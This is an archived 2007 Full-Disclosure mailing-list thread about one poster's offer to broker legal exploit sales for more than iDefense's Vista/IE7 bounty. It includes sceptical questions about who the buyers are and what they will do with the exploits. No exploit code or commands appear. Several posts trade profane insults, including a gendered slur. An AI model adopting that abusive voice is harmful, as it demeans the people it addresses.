 KF is 100% on the money. I can arrange the legitimate purchase of most
 working exploits for significantly more money than iDefense, In some cases
 over $75,000.00 per purchase. The company that I am working with has a
 relationship with a legitimate buyer, all transactions are legal. If you're
 
 naive
 
 I was wondering which kind of (legal) enterprises/organizations would pay
 $75000 for a simple (or not so simple) exploit.
 - governmental organizations (defense? DoD? FBI? ...)
 - firms offering high-profiled pen-testing services?
 - ... ?
 
 What about the ROI for such investment?
 
 /naive
 
 Regards,
 -Roman
 


Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE

2007-01-18 Thread Simon Smith
Nobody ever said that 75,000.00 was a price for a remote vista bug.


On 1/18/07 8:39 PM, [EMAIL PROTECTED] [EMAIL PROTECTED]
wrote:

 This is complete bullshit nothing more than a social engineering
 honey pot to get bugs and vulns for their own use, this company
 couldn't afford 75.ooo USD if they tried, they cannot even find
 their own bugs, they got 4 or 5 shitty research and vuln
 findings of their own, that's it.
 
 75.000 for a remote vista ie7 xploit, guaranteed you wont find it
 and if you do they won't pay
 
 lose lose :(
 
 jigga
 
 yo
 
 
 
 
 
 


Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE

2007-01-18 Thread Simon Smith
Sure he did ivan...



On 1/19/07 12:53 AM, Ivan . [EMAIL PROTECTED] wrote:

 75.000 for a remote vista ie7 xploit,




Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE

2007-01-18 Thread Simon Smith
Roman and List, 
Let me address this issue once and for all, because the issue is
really quite simple. I am offering security researchers the ability to have
their exploits legally purchased for a price that is higher than the
standard prices offered by the majority of third parties. The researchers
who decide to participate will be sent a legally binding contract. This
contract will specifically protect the researcher and buyer and clearly
spell out the terms and conditions of business.
  
And as for Roman's argument, I can assure him (and all of you) that the
exploit code will be put to ethical, legitimate and legal use. The only
people that will be using the exploit code are established U.S. based public
or private sector corporations/parties. Other than that I am not going to
get into a debate about it.

Lastly, it amazes me that so many people complain about the prices that
they sell their exploits for, then, when someone like me comes around to try
to give them fair pricing in a legal way, they'd rather complain about that
than take up the opportunity. This reminds me of old women who are always
trying to find a reason to complain. Nothing more than a bunch of grumpy old
women. ;]





   







On 1/18/07 7:53 PM, Roman Medina-Heigl Hernandez [EMAIL PROTECTED]
wrote:

 Then you cannot assure that your buyer will make an ethical use of the
 exploit. So what's the real difference against selling it to another people
 (known or unknown, where unknown could be black-hats, script-kiddies or
 whoever making the higher bid)? The receipt? :) I mean, if I (as a
 researcher) don't mind what the exploit will be used for, I'd simply look
 for the higher bidder (I guess).
 
 And you didn't really answer my former two questions... Please, could you
 provide some specific examples of typical ways to justify ROI? Which is the
 typical profile/s of enterprise/s buying exploits? (without naming
 particular enterprises, of course).
 
 
 
 Simon Smith escribió:
 Oh, 
 About your ROI question, that varies per buyer. I am not usually told
 about why a buyer needs something as that's none of my business.
 
 On 1/18/07 4:22 AM, Roman Medina-Heigl Hernandez [EMAIL PROTECTED]
 wrote:
 
 Simon Smith escribió:
 Amen!
 KF is 100% on the money. I can arrange the legitimate purchase of most
 working exploits for significantly more money than iDefense, In some cases
 over $75,000.00 per purchase. The company that I am working with has a
 relationship with a legitimate buyer, all transactions are legal. If you're
 naive
 
 I was wondering which kind of (legal) enterprises/organizations would pay
 $75000 for a simple (or not so simple) exploit.
 - governmental organizations (defense? DoD? FBI? ...)
 - firms offering high-profiled pen-testing services?
 - ... ?
 
 What about the ROI for such investment?
 
 /naive
 
 Regards,
 -Roman
 


Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE

2007-01-18 Thread Simon Smith
Dear NoBalls, 
What specifically is a fuckface anyway and why are you hiding behind
an anonymous email account?

More importantly, my words were not:

SAME TARGETS: ie7 VISTA 8k, I know someone who will pay much for up
to 75 for the same.

Hell that sentence doesn't even make any sense! What the heck does much for
up to 75 for the same even mean?

My EXACT words were:

Amen!
KF is 100% on the money. I can arrange the legitimate purchase of most
working exploits for significantly more money than iDefense, In some cases
over $75,000.00 per purchase. The company that I am working with has a
relationship with a legitimate buyer, all transactions are legal. If you're
interested contact me and we'll get the ball rolling.

-Simon
   

$8000.00 USD is low!

-End of my words- 

;]



On 1/19/07 1:05 AM, [EMAIL PROTECTED] [EMAIL PROTECTED]
wrote:

 SAME TARGETS: ie7 VISTA 8k, I know someone who will pay much for up
 to 75 for the same. YOUR WORDS FUCKFACE
 
 ST00PID LYING CUNT!
 
 I can arrange the legitimate purchase of most
 working exploits for significantly more money than iDefense, In
 some cases 
 over $75,000.00 per purchase.
 
  
 Re: [Full-disclosure] iDefense Q-1 2007 Challenge
 
 From: Simon Smith (simonsnosoft.com)
 Date: Tue Jan 16 2007 - 11:14:56 CST
 know someone who will pay significantly more per vulnerability
 against the 
 same targets. 
 
 
 
 On 1/10/07 12:27 PM, contributor Contributoridefense.com wrote:
 
 
 
   
 Also available at:
 
 
 
 
 http://labs.idefense.com/vcp/challenge.php#more_q1+2007%3A+vulnerability+challenge
 
 
 *Challenge Focus: Remote Arbitrary Code Execution Vulnerabilities
 in 
 Vista  IE 7.0* 
 
 
 
 On Fri, 19 Jan 2007 00:43:50 -0500 Simon Smith [EMAIL PROTECTED]
 wrote:
 Nobody ever said that 75,000.00 was a price for a remote vista
 bug.
 
 
 On 1/18/07 8:39 PM, [EMAIL PROTECTED]
 [EMAIL PROTECTED]
 wrote:
 
 This is complete bullshit nothing more than a social engineering
 honey pot to get bugs and vulns for their own use, this company
 couldn't afford 75.ooo USD if they tried, they cannot even find
 their own bugs, they got 4 or 5 shitty research and vuln
 findings of their own, that's it.
 
 75.000 for a remote vista ie7 xploit, guaranteed you wont find
 it
 and if you do they won't pay
 
 lose lose :(
 
 jigga
 
 yo
 
 
 
 
 
 


Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE

2007-01-18 Thread Simon Smith
Dumbass, you must be a part of the n3td3v ccr3w or something.

How did you go from 75,000 to 750,000?


On 1/19/07 1:38 AM, [EMAIL PROTECTED] [EMAIL PROTECTED]
wrote:

 Number one:
 
 1. An affidavit from your solicitors or accountants that
 USD750.000 has ever been dispensed through your company or your
 proxy company
 
 2. An affidavit from your solicitors or accountants, that you,
 your so-called client (who is you sno shit) have ever paid out
 upto 750.ooo usd {citing in some cases}
 
 PUT UP SHUT UP OR FUCK OFF. YOU COULDN'T FIND A VULN IF YOU TRIED.
 
 PROOF EVERY ONE WRONG LOUD MOUTH.
 
 On Fri, 19 Jan 2007 01:31:51 -0500 Simon Smith [EMAIL PROTECTED]
 wrote:
 Dear NoBalls, 
What specifically is a fuckface anyway and why are you
 hiding behind
 an anonymous email account?
 
 More importantly, my words were not:
 
 SAME TARGETS: ie7 VISTA 8k, I know someone who will pay much for
 up
 to 75 for the same.
 
 Hell that sentence doesn't even make any sense! What the heck does
 
 much for
 up to 75 for the same even mean?
 
 My EXACT words were:
 
 Amen!
KF is 100% on the money. I can arrange the legitimate purchase
 
 of most
 working exploits for significantly more money than iDefense, In
 some cases
 over $75,000.00 per purchase. The company that I am working with
 has a
 relationship with a legitimate buyer, all transactions are legal.
 If you're
 interested contact me and we'll get the ball rolling.
 
 -Simon
   
 
$8000.00 USD is low!
 
 -End of my words-
 
 ;]
 
 
 
 On 1/19/07 1:05 AM, [EMAIL PROTECTED]
 [EMAIL PROTECTED]
 wrote:
 
 SAME TARGETS: ie7 VISTA 8k, I know someone who will pay much for
 
 up
 to 75 for the same. YOUR WORDS FUCKFACE
 
 ST00PID LYING CUNT!
 
 I can arrange the legitimate purchase of most
 working exploits for significantly more money than iDefense, In
 some cases 
 over $75,000.00 per purchase.
 
  
 Re: [Full-disclosure] iDefense Q-1 2007 Challenge
 
 From: Simon Smith (simonsnosoft.com)
 Date: Tue Jan 16 2007 - 11:14:56 CST
 know someone who will pay significantly more per vulnerability
 against the 
 same targets. 
 
 
 
 On 1/10/07 12:27 PM, contributor Contributoridefense.com
 wrote:
 
 
 
   
 Also available at:
 
 
 
 
 
 http://labs.idefense.com/vcp/challenge.php#more_q1+2007%3A+vulnerability+challenge
 
 
 *Challenge Focus: Remote Arbitrary Code Execution
 Vulnerabilities
 in 
 Vista  IE 7.0*
 
 
 
 On Fri, 19 Jan 2007 00:43:50 -0500 Simon Smith
 [EMAIL PROTECTED]
 wrote:
 Nobody ever said that 75,000.00 was a price for a remote vista
 bug.
 
 
 On 1/18/07 8:39 PM, [EMAIL PROTECTED]
 [EMAIL PROTECTED]
 wrote:
 
 This is complete bullshit nothing more than a social
 engineering
 honey pot to get bugs and vulns for their own use, this
 company
 couldn't afford 75.ooo USD if they tried, they cannot even
 find
 their own bugs, they got 4 or 5 shitty research and vuln
 findings of their own, that's it.
 
 75.000 for a remote vista ie7 xploit, guaranteed you wont find
 it
 and if you do they won't pay
 
 lose lose :(
 
 jigga
 
 yo
 
 
 
 
 
 

